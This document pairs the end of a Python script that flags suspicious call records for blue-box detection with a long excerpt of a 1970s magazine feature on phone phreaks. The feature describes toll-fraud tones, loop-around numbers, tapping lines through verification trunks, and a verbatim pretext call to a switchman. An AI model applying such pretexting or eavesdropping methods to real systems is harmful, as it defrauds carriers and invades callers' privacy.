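class Record:
    origin: str
    origin_type: str  # "home" or "payphone"
    dialed: str
    minutes: int


def parse_tape(text):
    """Return (records, rejected_lines); malformed lines are kept for review."""
    records, rejected = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = [p.strip() for p in line.split(",")]
        ok = (
            len(parts) == 4
            and NUMBER_RE.match(parts[0])
            and parts[1] in ("home", "payphone")
            and NUMBER_RE.match(parts[2])
            and parts[3].isdigit()
        )
        if ok:
            records.append(Record(parts[0], parts[1], parts[2], int(parts[3])))
        else:
            rejected.append(line)
    return records, rejected


def classify(dialed):
    """Bucket a dialed number the way the accounting pass treats it."""
    npa, exchange, station = NUMBER_RE.match(dialed).groups()
    if npa == "800":
        return "toll_free"             # never billed, so duration is the only signal
    if exchange == "555" and station == "1212":
        return "directory_assistance"  # billed, so a long call stands out at billing
    return "ordinary"


def trouble_cards(records):
    """Flag calls whose duration does not fit the kind of number dialed."""
    cards = []
    for r in records:
        kind = classify(r.dialed)
        if kind == "toll_free" and r.minutes > MAX_TOLL_FREE_MIN:
            reason = "toll-free call far longer than expected"
        elif kind == "directory_assistance" and r.minutes > MAX_DIRECTORY_MIN:
            reason = "billable call to information far longer than a lookup"
        else:
            continue
        cards.append({
            "origin": r.origin,
            "dialed": r.dialed,
            "minutes": r.minutes,
            "reason": reason,
            # A pay-phone origin cannot be tied to a subscriber after the fact.
            "attributable": r.origin_type == "home",
        })
    return cards


if __name__ == "__main__":
    recs, bad = parse_tape(SAMPLE_TAPE)
    for card in trouble_cards(recs):
        print(card)
    print("rejected lines:", bad)
```

The pay-phone record is still flagged, but its card is marked as not attributable, which is the limit of next-day accounting review that the passage points out.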
"What about the recent series of blue-box arrests all across the country -- New York, Cleveland, and so on?" I asked. "How were they caught so easily?" "From what I can tell, they made one big mistake: they were seizing trunks using an area code plus 555-1212 instead of an 800 number. Using 555 is easy to detect because when you send multi-frequency beep tones of 555 you get a charge for it on your tape and the accounting computer knows there's something wrong when it tries to bill you for a two-hour call to Akron, Ohio, information, and it drops a trouble card which goes right into the hands of the security agent if they're looking for blue-box user. "Whoever sold those guys their blue boxes didn't tell them how to use them properly, which is fairly irresponsible. And they were fairly stupid to use them at home all the time. "But what those arrests really mean is than an awful lot of blue boxes are flooding into the country and that people are finding them so easy to make that they know how to make them before they know how to use them. Ma Bell is in trouble." And if a blue-box operator or a cassette-recorder phone phreak sticks to pay phones and 800 numbers, the phone company can't stop them? "Not unless they change their entire nationwide long-lines technology, which will take them a few billion dollars and twenty years. Right now they can't do a thing. They're screwed." Captain Crunch Demonstrates His Famous Unit There is an underground telephone network in this country. Gilbertson discovered it the very day news of his activities hit the papers. That evening his phone began ringing. Phone phreaks from Seattle, from Florida, from New York, from San Jose, and from Los Angeles began calling him and telling him about the phone-phreak network. He'd get a call from a phone phreak who'd say nothing but, "Hang up and call this number." 
When he dialed the number he'd find himself tied into a conference of a dozen phone phreaks arranged through a quirky switching station in British Columbia. They identified themselves as phone phreaks, they demonstrated their homemade blue boxes which they called "M-Fers" (for "multi-frequency," among other things) for him, they talked shop about phone-phreak devices. They let him in on their secrets on the theory that if the phone company was after him he must be trustworthy. And, Gilbertson recalls, they stunned him with their technical sophistication. I ask him how to get in touch with the phone-phreak network. He digs around through a file of old schematics and comes up with about a dozen numbers in three widely separated area codes. "Those are the centers," he tells me. Alongside some of the numbers he writes in first names or nicknames: names like Captain Crunch, Dr. No, Frank Carson (also a code word for a free call), Marty Freeman (code word for M-F device), Peter Perpendicular Pimple, Alefnull, and The Cheshire Cat. He makes checks alongside the names of those among these top twelve who are blind. There are five checks. I ask him who this Captain Crunch person is. "Oh. The Captain. He's probably the most legendary phone phreak. He calls himself Captain Crunch after the notorious Cap'n Crunch 2600 whistle." (Several years ago, Gilbertson explains, the makers of Cap'n Crunch breakfast cereal offered a toy-whistle prize in every box as a treat for the Cap'n Crunch set. Somehow a phone phreak discovered that the toy whistle just happened to produce a perfect 2600-cycle tone. When the man who calls himself Captain Crunch was transferred overseas to England with his Air Force unit, he would receive scores of calls from his friends and "mute" them -- make them free of charge to them -- by blowing his Cap'n Crunch whistle into his end.) "Captain Crunch is one of the older phone phreaks," Gilbertson tells me. 
"He's an engineer who once got in a little trouble for fooling around with the phone, but he can't stop. Well, the guy drives across country in a Volkswagen van with an entire switchboard and a computerized super-sophisticated M-F-er in the back. He'll pull up to a phone booth on a lonely highway somewhere, snake a cable out of his bus, hook it onto the phone and sit for hours, days sometimes, sending calls zipping back and forth across the country, all over the world...." Back at my motel, I dialed the number he gave me for "Captain Crunch" and asked for G---- T-----, his real name, or at least the name he uses when he's not dashing into a phone booth beeping out M-F tones faster than a speeding bullet and zipping phantomlike through the phone company's long-distance lines. When G---- T----- answered the phone and I told him I was preparing a story for Esquire about phone phreaks, he became very indignant. "I don't do that. I don't do that anymore at all. And if I do it, I do it for one reason and one reason only. I'm learning about a system. The phone company is a System. A computer is a System, do you understand? If I do what I do, it is only to explore a system. Computers, systems, that's my bag. The phone company is nothing but a computer." A tone of tightly restrained excitement enters the Captain's voice when he starts talking about systems. He begins to pronounce each syllable with the hushed deliberation of an obscene caller. "Ma Bell is a system I want to explore. It's a beautiful system, you know, but Ma Bell screwed up. It's terrible because Ma Bell is such a beautiful system, but she screwed up. I learned how she screwed up from a couple of blind kids who wanted me to build a device. A certain device. They said it could make free calls. I wasn't interested in free calls. But when these blind kids told me I could make calls into a computer, my eyes lit up. I wanted to learn about computers. I wanted to learn about Ma Bell's computers. 
So I built the little device, but I built it wrong and Ma Bell found out. Ma Bell can detect things like that. Ma Bell knows. So I'm strictly rid of it now. I don't do it. Except for learning purposes." He pauses. "So you want to write an article. Are you paying for this call? Hang up and call this number." He gives me a number in an area code a thousand miles away from his own. I dial the number. "Hello again. This is Captain Crunch. You are speaking to me on a toll-free loop-around in Portland, Oregon. Do you know what a toll-free loop-around is? I'll tell you." He explains to me that almost every exchange in the country has open test numbers which allow other exchanges to test their connections with it. Most of these numbers occur in consecutive pairs, such as 302 956-0041 and 302 956-0042. Well, certain phone phreaks discovered that if two people from anywhere in the country dial the two consecutive numbers they can talk together just as if one had called the other's number, with no charge to either of them, of course. "Now our voice is looping around in a 4A switching machine up there in Canada, zipping back down to me," the Captain tells me. "My voice is looping around up there and back down to you. And it can't ever cost anyone money. The phone phreaks and I have compiled a list of many of these numbers. You would be surprised if you saw the list. I could show it to you. But I won't. I'm out of that now. I'm not out to screw Ma Bell. I know better. If I do anything it's for the pure knowledge of the System. You can learn to do fantastic things. Have you ever heard eight tandems stacked up? Do you know the sound of tandems stacking and unstacking? Give me your phone number. Okay. Hang up now and wait a minute." Slightly less than a minute later the phone rang and the Captain was on the line, his voice sounding far more excited, almost aroused. "I wanted to show you what it's like to stack up tandems. To stack up tandems."
(Whenever the Captain says "stack up" it sounds as if he is licking his lips.) "How do you like the connection you're on now?" the Captain asks me. "It's a raw tandem. A raw tandem. Ain't nothin' up to it but a tandem. Now I'm going to show you what it's like to stack up. Blow off. Land in a far away place. To stack that tandem up, whip back and forth across the country a few times, then shoot on up to Moscow. "Listen," Captain Crunch continues. "Listen. I've got line tie on my switchboard here, and I'm gonna let you hear me stack and unstack tandems. Listen to this. It's gonna blow your mind." First I hear a super rapid-fire pulsing of the flutelike phone tones, then a pause, then another popping burst of tones, then another, then another. Each burst is followed by a beep-kachink sound. "We have now stacked up four tandems," said Captain Crunch, sounding somewhat remote. "That's four tandems stacked up. Do you know what that means? That means I'm whipping back and forth, back and forth twice, across the country, before coming to you. I've been known to stack up twenty tandems at a time. Now, just like I said, I'm going to shoot up to Moscow." There is a new, longer series of beeper pulses over the line, a brief silence, then a ring. "Hello," answers a far-off voice. "Hello. Is this the American Embassy Moscow?" "Yes, sir. Who is this calling?" says the voice. "Yes. This is test board here in New York. We're calling to check out the circuits, see what kind of lines you've got. Everything okay there in Moscow?" "Okay?" "Well, yes, how are things there?" "Oh. Well, everything okay, I guess." "Okay. Thank you." They hang up, leaving a confused series of beep-kachink sounds hanging in mid-ether in the wake of the call before dissolving away. The Captain is pleased. "You believe me now, don't you? Do you know what I'd like to do? I'd just like to call up your editor at Esquire and show him just what it sounds like to stack and unstack tandems.
I'll give him a show that will blow his mind. What's his number?" I ask the Captain what kind of device he was using to accomplish all his feats. The Captain is pleased at the question. "You could tell it was special, couldn't you? Ten pulses per second. That's faster than the phone company's equipment. Believe me, this unit is the most famous unit in the country. There is no other unit like it. Believe me." "Yes, I've heard about it. Some other phone phreaks have told me about it." "They have been referring to my, ahem, unit? What is it they said? Just out of curiosity, did they tell you it was a highly sophisticated computer-operated unit, with acoustical coupling for receiving outputs and a switch-board with multiple-line-tie capability? Did they tell you that the frequency tolerance is guaranteed to be not more than .05 percent? The amplitude tolerance less than .01 decibel? Those pulses you heard were perfect. They just come faster than the phone company. Those were high-precision op-amps. Op-amps are instrumentation amplifiers designed for ultra-stable amplification, super-low distortion and accurate frequency response. Did they tell you it can operate in temperatures from -55°C to +125°C?" I admit that they did not tell me all that. "I built it myself," the Captain goes on. "If you were to go out and buy the components from an industrial wholesaler it would cost you at least $1500. I once worked for a semiconductor company and all this didn't cost me a cent. Do you know what I mean? Did they tell you about how I put a call completely around the world? I'll tell you how I did it. I M-Fed Tokyo inward, who connected me to India, India connected me to Greece, Greece connected me to Pretoria, South Africa, South Africa connected me to South America, I went from South America to London, I had a London operator connect me to a New York operator, I had New York connect me to a California operator who rang the phone next to me.
Needless to say I had to shout to hear myself. But the echo was far out. Fantastic. Delayed. It was delayed twenty seconds, but I could hear myself talk to myself." "You mean you were speaking into the mouthpiece of one phone sending your voice around the world into your ear through a phone on the other side of your head?" I asked the Captain. I had a vision of something vaguely autoerotic going on, in a complex electronic way. "That's right," said the Captain. "I've also sent my voice around the world one way, going east on one phone, and going west on the other, going through cable one way, satellite the other, coming back together at the same time, ringing the two phones simultaneously and picking them up and whipping my voice both ways around the world back to me. Wow. That was a mind blower." "You mean you sit there with both phones on your ear and talk to yourself around the world," I said incredulously. "Yeah. Um hum. That's what I do. I connect the phone together and sit there and talk." "What do you say? What do you say to yourself when you're connected?" "Oh, you know. Hello test one two three," he says in a low-pitched voice. "Hello test one two three," he replied to himself in a high-pitched voice. "Hello test one two three," he repeats again, low-pitched. "Hello test one two three," he replies, high-pitched. "I sometimes do this: Hello Hello Hello Hello, Hello, hello," he trails off and breaks into laughter. Why Captain Crunch Hardly Ever Taps Phones Anymore Using internal phone-company codes, phone phreaks have learned a simple method for tapping phones. Phone-company operators have in front of them a board that holds verification jacks. It allows them to plug into conversations in case of emergency, to listen in to a line to determine if the line is busy or the circuits are busy. 
Phone phreaks have learned to beep out the codes which lead them to a verification operator, tell the verification operator they are switchmen from some other area code testing out verification trunks. Once the operator hooks them into the verification trunk, they disappear into the board for all practical purposes, slip unnoticed into any one of the 10,000 to 100,000 numbers in that central office without the verification operator knowing what they're doing, and of course without the two parties to the connection knowing there is a phantom listener present on their line. Toward the end of my hour-long first conversation with him, I asked the Captain if he ever tapped phones. "Oh no. I don't do that. I don't think it's right," he told me firmly. "I have the power to do it but I don't... Well one time, just one time, I have to admit that I did. There was this girl, Linda, and I wanted to find out... you know. I tried to call her up for a date. I had a date with her the last weekend and I thought she liked me. I called her up, man, and her line was busy, and I kept calling and it was still busy. Well, I had just learned about this system of jumping into lines and I said to myself, 'Hmmm. Why not just see if it works. It'll surprise her if all of a sudden I should pop up on her line. It'll impress her, if anything.' So I went ahead and did it. I M-Fed into the line. My M-F-er is powerful enough when patched directly into the mouthpiece to trigger a verification trunk without using an operator the way the other phone phreaks have to. "I slipped into the line and there she was talking to another boyfriend. Making sweet talk to him. I didn't make a sound because I was so disgusted. So I waited there for her to hang up, listening to her making sweet talk to the other guy. You know. So as soon as she hung up I instantly M-F-ed her up and all I said was, 'Linda, we're through.' And I hung up. And it blew her head off. She couldn't figure out what the hell happened. 
"But that was the only time. I did it thinking I would surprise her, impress her. Those were all my intentions were, and well, it really kind of hurt me pretty badly, and... and ever since then I don't go into verification trunks." Moments later my first conversation with the Captain comes to a close. "Listen," he says, his spirits somewhat cheered, "listen. What you are going to hear when I hang up is the sound of tandems unstacking. Layer after layer of tandems unstacking until there's nothing left of the stack, until it melts away into nothing. Cheep, cheep, cheep, cheep," he concludes, his voice descending to a whisper with each cheep. He hangs up. The phone suddenly goes into four spasms: kachink cheep. Kachink cheep kachink cheep kachink cheep, and the complex connection has wiped itself out like the Cheshire cat's smile. The MF Boogie Blues The next number I choose from the select list of phone-phreak alumni, prepared for me by the blue-box inventor, is a Memphis number. It is the number of Joe Engressia, the first and still perhaps the most accomplished blind phone phreak. Three years ago Engressia was a nine-day wonder in newspapers and magazines all over America because he had been discovered whistling free long-distance connections for fellow students at the University of South Florida. Engressia was born with perfect pitch: he could whistle phone tones better than the phone-company's equipment. Engressia might have gone on whistling in the dark for a few friends for the rest of his life if the phone company hadn't decided to expose him. He was warned, disciplined by the college, and the whole case became public. In the months following media reports of his talent, Engressia began receiving strange calls. There were calls from a group of kids in Los Angeles who could do some very strange things with the quirky General Telephone and Electronics circuitry in LA suburbs. 
There were calls from a group of mostly blind kids in ----, California, who had been doing some interesting experiments with Cap'n Crunch whistles and test loops. There was a group in Seattle, a group in Cambridge, Massachusetts, a few from New York, a few scattered across the country. Some of them had already equipped themselves with cassette and electronic M-F devices. For some of these groups, it was the first time they knew of the others. The exposure of Engressia was the catalyst that linked the separate phone-phreak centers together. They all called Engressia. They talked to him about what he was doing and what they were doing. And then he told them -- the scattered regional centers and lonely independent phone phreakers -- about each other, gave them each other's numbers to call, and within a year the scattered phone-phreak centers had grown into a nationwide underground. Joe Engressia is only twenty-two years old now, but along the phone-phreak network he is "the old man," accorded by phone phreaks something of the reverence the phone company bestows on Alexander Graham Bell. He seldom needs to make calls anymore. The phone phreaks all call him and let him know what new tricks, new codes, new techniques they have learned. Every night he sits like a sightless spider in his little apartment receiving messages from every tendril of his web. It is almost a point of pride with Joe that they call him. But when I reached him in his Memphis apartment that night, Joe Engressia was lonely, jumpy and upset. "God, I'm glad somebody called. I don't know why tonight of all nights I don't get any calls. This guy around here got drunk again tonight and propositioned me again. I keep telling him we'll never see eye to eye on this subject, if you know what I mean. I try to make light of it, you know, but he doesn't get it. I can hear him out there getting drunker and I don't know what he'll do next.
It's just that I'm really all alone here, just moved to Memphis, it's the first time I'm living on my own, and I'd hate for it to all collapse now. But I won't go to bed with him. I'm just not very interested in sex and even if I can't see him I know he's ugly. "Did you hear that? That's him banging a bottle against the wall outside. He's nice. Well forget about it. You're doing a story on phone phreaks? Listen to this. It's the MF Boogie Blues." Sure enough, a jumpy version of Muskrat Ramble boogies its way over the line, each note one of those long-distance phone tones. The music stops. A huge roaring voice blasts the phone off my ear: "AND THE QUESTION IS..." roars the voice, "CAN A BLIND PERSON HOOK UP AN AMPLIFIER ON HIS OWN?" The roar ceases. A high-pitched operator-type voice replaces it. "This is Southern Braille Tel. & Tel. Have tone, will phone." This is succeeded by a quick series of M-F tones, a swift "kachink" and a deep reassuring voice: "If you need home care, call the visiting-nurses association. First National time in Honolulu is 4:32 p.m." Joe back in his Joe voice again: "Are we seeing eye to eye? 'Si, si,' said the blind Mexican. Ahem. Yes. Would you like to know the weather in Tokyo?" This swift manic sequence of phone-phreak vaudeville stunts and blind-boy jokes manages to keep Joe's mind off his tormentor only as long as it lasts. "The reason I'm in Memphis, the reason I have to depend on that homosexual guy, is that this is the first time I've been able to live on my own and make phone trips on my own.
I've been banned from all central offices around home in Florida, they knew me too well, and at the University some of my fellow scholars were always harassing me because I was on the dorm pay phone all the time and making fun of me because of my fat ass, which of course I do have, it's my physical fatness program, but I don't like to hear it every day, and if I can't phone trip and I can't phone phreak, I can't imagine what I'd do, I've been devoting three quarters of my life to it. "I moved to Memphis because I wanted to be on my own as well as because it has a Number 5 crossbar switching system and some interesting little independent phone-company districts nearby and so far they don't seem to know who I am so I can go on phone tripping, and for me phone tripping is just as important as phone phreaking." Phone tripping, Joe explains, begins with calling up a central-office switch room. He tells the switchman in a polite earnest voice that he's a blind college student interested in telephones, and could he perhaps have a guided tour of the switching station? Each step of the tour Joe likes to touch and feel relays, caress switching circuits, switchboards, crossbar arrangements. So when Joe Engressia phone phreaks he feels his way through the circuitry of the country garden of forking paths, he feels switches shift, relays shunt, crossbars swivel, tandems engage and disengage even as he hears -- with perfect pitch -- his M-F pulses make the entire Bell system dance to his tune. Just one month ago Joe took all his savings out of his bank and left home, over the emotional protests of his mother. "I ran away from home almost," he likes to say. Joe found a small apartment house on Union Avenue and began making phone trips. He'd take a bus a hundred miles south in Mississippi to see some old-fashioned Bell equipment still in use in several states, which had been puzzling. 
He'd take a bus three hundred miles to Charlotte, North Carolina, to look at some brand-new experimental equipment. He hired a taxi to drive him twelve miles to a suburb to tour the office of a small phone company with some interesting idiosyncrasies in its routing system. He was having the time of his life, he said, the most freedom and pleasure he had known. In that month he had done very little long-distance phone phreaking from his own phone. He had begun to apply for a job with the phone company, he told me, and he wanted to stay away from anything illegal. "Any kind of job will do, anything as menial as the most lowly operator. That's probably all they'd give me because I'm blind. Even though I probably know more than most switchmen. But that's okay. I want to work for Ma Bell. I don't hate Ma Bell the way Gilbertson and some phone phreaks do. I don't want to screw Ma Bell. With me it's the pleasure of pure knowledge. There's something beautiful about the system when you know it intimately the way I do. But I don't know how much they know about me here. I have a very intuitive feel for the condition of the line I'm on, and I think they're monitoring me off and on lately, but I haven't been doing much illegal. I have to make a few calls to switchmen once in a while which aren't strictly legal, and once I took an acid trip and was having these auditory hallucinations as if I were trapped and these planes were dive-bombing me, and all of a sudden I had to phone phreak out of there. For some reason I had to call Kansas City, but that's all." A Warning Is Delivered At this point -- one o'clock in my time zone -- a loud knock on my motel-room door interrupts our conversation. Outside the door I find a uniformed security guard who informs me that there has been an "emergency phone call" for me while I have been on the line and that the front desk has sent him up to let me know. Two seconds after I say good-bye to Joe and hang up, the phone rings.
"Who were you talking to?" the agitated voice demands. The voice belongs to Captain Crunch. "I called because I decided to warn you of something. I decided to warn you to be careful. I don't want this information you get to get to the radical underground. I don't want it to get into the wrong hands. What would you say if I told you it's possible for three phone phreaks to saturate the phone system of the nation. Saturate it. Busy it out. All of it. I know how to do this. I'm not gonna tell. A friend of mine has already saturated the trunks between Seattle and New York. He did it with a computerized M-F-er hitched into a special Manitoba exchange. But there are other, easier ways to do it." Just three people? I ask. How is that possible? "Have you ever heard of the long-lines guard frequency? Do you know about stacking tandems with 17 and 2600? Well, I'd advise you to find out about it. I'm not gonna tell you. But whatever you do, don't let this get into the hands of the radical underground." (Later Gilbertson, the inventor, confessed that while he had always been skeptical about the Captain's claim of the sabotage potential of trunk-tying phone phreaks, he had recently heard certain demonstrations which convinced him the Captain was not speaking idly. "I think it might take more than three people, depending on how many machines like Captain Crunch's were available. But even though the Captain sounds a little weird, he generally turns out to know what he's talking about.") "You know," Captain Crunch continues in his admonitory tone, "you know the younger phone phreaks call Moscow all the time. Suppose everybody were to call Moscow. I'm no right-winger. But I value my life. I don't want the Commies coming over and dropping a bomb on my head. That's why I say you've got to be careful about who gets this information." The Captain suddenly shifts into a diatribe against those phone phreaks who don't like the phone company. 
"They don't understand, but Ma Bell knows everything they do. Ma Bell knows. Listen, is this line hot? I just heard someone tap in. I'm not paranoid, but I can detect things like that. Well, even if it is, they know that I know that they know that I have a bulk eraser. I'm very clean." The Captain pauses, evidently torn between wanting to prove to the phone-company monitors that he does nothing illegal, and the desire to impress Ma Bell with his prowess. "Ma Bell knows how good I am. And I am quite good. I can detect reversals, tandem switching, everything that goes on a line. I have relative pitch now. Do you know what that means? My ears are a $20,000 piece of equipment. With my ears I can detect things they can't hear with their equipment. I've had employment problems. I've lost jobs. But I want to show Ma Bell how good I am. I don't want to screw her, I want to work for her. I want to do good for her. I want to help her get rid of her flaws and become perfect. That's my number-one goal in life now." The Captain concludes his warnings and tells me he has to be going. "I've got a little action lined up for tonight," he explains and hangs up. Before I hang up for the night, I call Joe Engressia back. He reports that his tormentor has finally gone to sleep -- "He's not blind drunk, that's the way I get, ahem, yes; but you might say he's in a drunken stupor." I make a date to visit Joe in Memphis in two days. A Phone Phreak Call Takes Care of Business The next morning I attend a gathering of four phone phreaks in ----- (a California suburb). The gathering takes place in a comfortable split-level home in an upper-middle-class subdivision. Heaped on the kitchen table are the portable cassette recorders, M-F cassettes, phone patches, and line ties of the four phone phreaks present. On the kitchen counter next to the telephone is a shoe-box-size blue box with thirteen large toggle switches for the tones. 
The parents of the host phone phreak, Ralph, who is blind, stay in the living room with their sighted children. They are not sure exactly what Ralph and his friends do with the phone or if it's strictly legal, but he is blind and they are pleased he has a hobby which keeps him busy. The group has been working at reestablishing the historic "2111" conference, reopening some toll-free loops, and trying to discover the dimensions of what seem to be new initiatives against phone phreaks by phone-company security agents. It is not long before I get a chance to see, to hear, Randy at work. Randy is known among the phone phreaks as perhaps the finest con man in the game. Randy is blind. He is pale, soft and pear-shaped, he wears baggy pants and a wrinkly nylon white sport shirt, pushes his head forward from hunched shoulders somewhat like a turtle inching out of its shell. His eyes wander, crossing and recrossing, and his forehead is somewhat pimply. He is only sixteen years old. But when Randy starts speaking into a telephone mouthpiece his voice becomes so stunningly authoritative it is necessary to look again to convince yourself it comes from a chubby adolescent Randy. Imagine the voice of a crack oil-rig foreman, a tough, sharp, weather-beaten Marlboro man of forty. Imagine the voice of a brilliant performance-fund gunslinger explaining how he beats the Dow Jones by thirty percent. Then imagine a voice that could make those two sound like Stepin Fetchit. That is sixteen-year-old Randy's voice. He is speaking to a switchman in Detroit. The phone company in Detroit had closed up two toll-free loop pairs for no apparent reason, although heavy use by phone phreaks all over the country may have been detected. Randy is telling the switchman how to open up the loop and make it free again: "How are you, buddy. Yeah. I'm on the board in here in Tulsa, Oklahoma, and we've been trying to run some tests on your loop-arounds and we find 'em busied out on both sides....
Yeah, we've been getting a 'BY' on them, what d'ya say, can you drop cards on 'em? Do you have 08 on your number group? Oh that's okay, we've had this trouble before, we may have to go after the circuit. Here lemme give 'em to you: your frame is 05, vertical group 03, horizontal 5, vertical file 3. Yeah, we'll hang on here.... Okay, found it? Good. Right, yeah, we'd like to clear that busy out. Right. All you have to do is look for your key on the mounting plate, it's in your miscellaneous trunk frame. Okay? Right. Now pull your key from NOR over the LCT. Yeah. I don't know why that happened, but we've been having trouble with that one. Okay. Thanks a lot fella. Be seein' ya." Randy hangs up, reports that the switchman was a little inexperienced with the loop-around circuits on the miscellaneous trunk frame, but that the loop has been returned to its free-call status. Delighted, phone phreak Ed returns the pair of numbers to the active-status column in his directory. Ed is a superb and painstaking researcher. With almost Talmudic thoroughness he will trace tendrils of hints through soft-wired mazes of intervening phone-company circuitry back through complex linkages of switching relays to find the location and identity of just one toll-free loop. He spends hours and hours, every day, doing this sort of thing. He has somehow compiled a directory of eight hundred "Band-six in-WATS numbers" located in over forty states. Band-six in-WATS numbers are the big 800 numbers -- the ones that can be dialed into free from anywhere in the country. Ed the researcher, a nineteen-year-old engineering student, is also a superb technician. He put together his own working blue box from scratch at age seventeen. (He is sighted.) This evening after distributing the latest issue of his in-WATS directory (which has been typed into Braille for the blind phone phreaks), he announces he has made a major new breakthrough: "I finally tested it and it works, perfectly. 
I've got this switching matrix which converts any touch-tone phone into an M-F-er." The tones you hear in touch-tone phones are not the M-F tones that operate the long-distance switching system. Phone phreaks believe A.T.&T. had deliberately equipped touch tones with a different set of frequencies to avoid putting the six master M-F tones in the hands of every touch-tone owner. Ed's complex switching matrix puts the six master tones, in effect puts a blue box, in the hands of every touch-tone owner. Ed shows me pages of schematics, specifications and parts lists. "It's not easy to build, but everything here is in the Heathkit catalog." Ed asks Ralph what progress he has made in his attempts to reestablish a long-term open conference line for phone phreaks. The last big conference -- the historic "2111" conference -- had been arranged through an unused Telex test-board trunk somewhere in the innards of a 4A switching machine in Vancouver, Canada. For months phone phreaks could M-F their way into Vancouver, beep out 604 (the Vancouver area code) and then beep out 2111 (the internal phone-company code for Telex testing), and find themselves at any time, day or night, on an open wire talking with an array of phone phreaks from coast to coast, operators from Bermuda, Tokyo and London who are phone-phreak sympathizers, and miscellaneous guests and technical experts. The conference was a massive exchange of information. Phone phreaks picked each other's brains clean, then developed new ways to pick the phone company's brains clean. Ralph gave M-F Boogies concerts with his home-entertainment-type electric organ, Captain Crunch demonstrated his round-the-world prowess with his notorious computerized unit and dropped leering hints of the "action" he was getting with his girl friends. (The Captain lives out or pretends to live out several kinds of fantasies to the gossipy delight of the blind phone phreaks who urge him on to further triumphs on behalf of all of them.) 
The somewhat rowdy Northwest phone-phreak crowd let their bitter internal feud spill over into the peaceable conference line, escalating shortly into guerrilla warfare; Carl the East Coast international tone relations expert demonstrated newly opened direct M-F routes to central offices on the island of Bahrein in the Persian Gulf, introduced a new phone-phreak friend of his in Pretoria, and explained the technical operation of the new Oakland-to-Vietnam linkages. (Many phone phreaks pick up spending money by M-F-ing calls from relatives to Vietnam GIs charging $5 for a whole hour of trans-Pacific conversation.) Day and night the conference line was never dead. Blind phone phreaks all over the country, lonely and isolated in homes filled with active sighted brothers and sisters, or trapped with slow and unimaginative blind kids in straitjacket schools for the blind, knew that no matter how late it got they could dial up the conference and find instant electronic communion with two or three other blind kids awake over on the other side of America. Talking together on a phone hookup, the blind phone phreaks say, is not much different from being there together. Physically, there was nothing more than a two-inch-square wafer of titanium inside a vast machine on Vancouver Island. For the blind kids >there< meant an exhilarating feeling of being in touch, through a kind of skill and magic which was peculiarly their own. Last April 1, however, the long Vancouver Conference was shut off. The phone phreaks knew it was coming. Vancouver was in the process of converting from a step-by-step system to a 4A machine and the 2111 Telex circuit was to be wiped out in the process. The phone phreaks learned the actual day on which the conference would be erased about a week ahead of time over the phone company's internal-news-and-shop-talk recording. For the next frantic seven days every phone phreak in America was on and off the 2111 conference twenty-four hours a day. 
Phone phreaks who were just learning the game or didn't have M-F capability were boosted up to the conference by more experienced phreaks so they could get a glimpse of what it was like before it disappeared. Top phone phreaks searched distant area codes for new conference possibilities without success. Finally in the early morning of April 1, the end came. "I could feel it coming a couple hours before midnight," Ralph remembers. "You could feel something going on in the lines. Some static began showing up, then some whistling wheezing sound. Then there were breaks. Some people got cut off and called right back in, but after a while some people were finding they were cut off and couldn't get back in at all. It was terrible. I lost it about one a.m., but managed to slip in again and stay on until the thing died... I think it was about four in the morning. There were four of us still hanging on when the conference disappeared into nowhere for good. We all tried to M-F up to it again of course, but we got silent termination. There was nothing there." The Legendary Mark Bernay Turns Out To Be "The Midnight Skulker" Mark Bernay. I had come across that name before. It was on Gilbertson's select list of phone phreaks. The California phone phreaks had spoken of a mysterious Mark Bernay as perhaps the first and oldest phone phreak on the West Coast. And in fact almost every phone phreak in the West can trace his origins either directly to Mark Bernay or to a disciple of Mark Bernay. It seems that five years ago this Mark Bernay (a pseudonym he chose for himself) began traveling up and down the West Coast pasting tiny stickers in phone books all along his way. The stickers read something like "Want to hear an interesting tape recording? Call these numbers." The numbers that followed were toll-free loop-around pairs. 
When one of the curious called one of the numbers he would hear a tape recording pre-hooked into the loop by Bernay which explained the use of loop-around pairs, gave the numbers of several more, and ended by telling the caller, "At six o'clock tonight this recording will stop and you and your friends can try it out. Have fun." "I was disappointed by the response at first," Bernay told me, when I finally reached him at one of his many numbers and he had dispensed with the usual "I never do anything illegal" formalities with which experienced phone phreaks open most conversations. "I went all over the coast with these stickers not only on pay phones, but I'd throw them in front of high schools in the middle of the night, I'd leave them unobtrusively in candy stores, scatter them on main streets of small towns. At first hardly anyone bothered to try it out. I would listen in for hours and hours after six o'clock and no one came on. I couldn't figure out why people wouldn't be interested. Finally these two girls in Oregon tried it out and told all their friends and suddenly it began to spread." Before his Johnny Appleseed trip Bernay had already gathered a sizable group of early pre-blue-box phone phreaks together on loop-arounds in Los Angeles. Bernay does not claim credit for the original discovery of the loop-around numbers. He attributes the discovery to an eighteen-year-old reform school kid in Long Beach whose name he forgets and who, he says, "just disappeared one day." When Bernay himself discovered loop-arounds independently, from clues in his readings in old issues of the Automatic Electric Technical Journal, he found dozens of the reform-school kid's friends already using them. However, it was one of Bernay's disciples in Seattle that introduced phone phreaking to blind kids. The Seattle kid who learned about loops through Bernay's recording told a blind friend, the blind kid taught the secret to his friends at a winter camp for blind kids in Los Angeles. 
When the camp session was over these kids took the secret back to towns all over the West. This is how the original blind kids became phone phreaks. For them, for most phone phreaks in general, it was the discovery of the possibilities of loop-arounds which led them on to far more serious and sophisticated phone-phreak methods, and which gave them a medium for sharing their discoveries. A year later a blind kid who moved back east brought the technique to a blind kids' summer camp in Vermont, which spread it along the East Coast. All from a Mark Bernay sticker. Bernay, who is nearly thirty years old now, got his start when he was fifteen and his family moved into an L.A. suburb serviced by General Telephone and Electronics equipment. He became fascinated with the differences between Bell and G.T.&E. equipment. He learned he could make interesting things happen by carefully timed clicks with the disengage button. He learned to interpret subtle differences in the array of clicks, whirrs and kachinks he could hear on his lines. He learned he could shift himself around the switching relays of the L.A. area code in a not-too-predictable fashion by interspersing his own hook-switch clicks with the clicks within the line. (Independent phone companies -- there are nineteen hundred of them still left, most of them tiny island principalities in Ma Bell's vast empire -- have always been favorites with phone phreaks, first as learning tools, then as Archimedes platforms from which to manipulate the huge Bell system. A phone phreak in Bell territory will often M-F himself into an independent's switching system, with switching idiosyncrasies which can give him marvelous leverage over the Bell System.) "I have a real affection for Automatic Electric Equipment," Bernay told me. "There are a lot of things you can play with. Things break down in interesting ways." 
